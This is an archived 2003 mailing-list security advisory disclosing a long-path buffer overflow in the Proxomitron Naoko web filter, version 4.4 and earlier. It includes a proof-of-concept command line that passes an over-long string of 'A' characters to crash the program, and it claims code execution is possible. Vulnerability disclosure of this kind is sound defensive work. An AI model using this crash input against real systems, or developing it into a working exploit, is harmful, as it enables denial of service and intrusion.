From gregory.lebras@security-corp.org Thu Feb 20 20:26:15 2003 From: "[iso-8859-1] Grégory Le Bras | Security Corporation" To: vulnwatch@vulnwatch.org Date: Wed, 19 Feb 2003 21:23:33 +0100 Subject: [VulnWatch] [SCSA-005] Proxomitron Naoko Long Path Buffer Overflow/DoS [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] .: Proxomitron Naoko Long Path Buffer Overflow/DoS :. ________________________________________________________________________ Security Corporation Security Advisory [SCSA-005] ________________________________________________________________________ PROGRAM: The Proxomitron Naoko HOMEPAGE: http://www.proxomitron.org/ VULNERABLE VERSIONS: 4.4 and prior ________________________________________________________________________ DESCRIPTION ________________________________________________________________________ The Proxomitron is an Universal Web Filter. (direct quote from Proxomitron website) DETAILS & EXPLOITS ________________________________________________________________________ Sending a parameter with a buffer of 1024 bytes in length or more, causes Proxomitron Naoko to crash. This vulnerability can be easily exploited to execute code. Exploitation example : c:\Proxomitron>proxomitron AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA SOLUTIONS ________________________________________________________________________ No solution for the moment. VENDOR STATUS ________________________________________________________________________ The vendor has reportedly been notified LINKS ________________________________________________________________________ French Version : http://www.security-corp.org/advisories/SCSA-005-FR.txt ------------------------------------------------------------ Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org ------------------------------------------------------------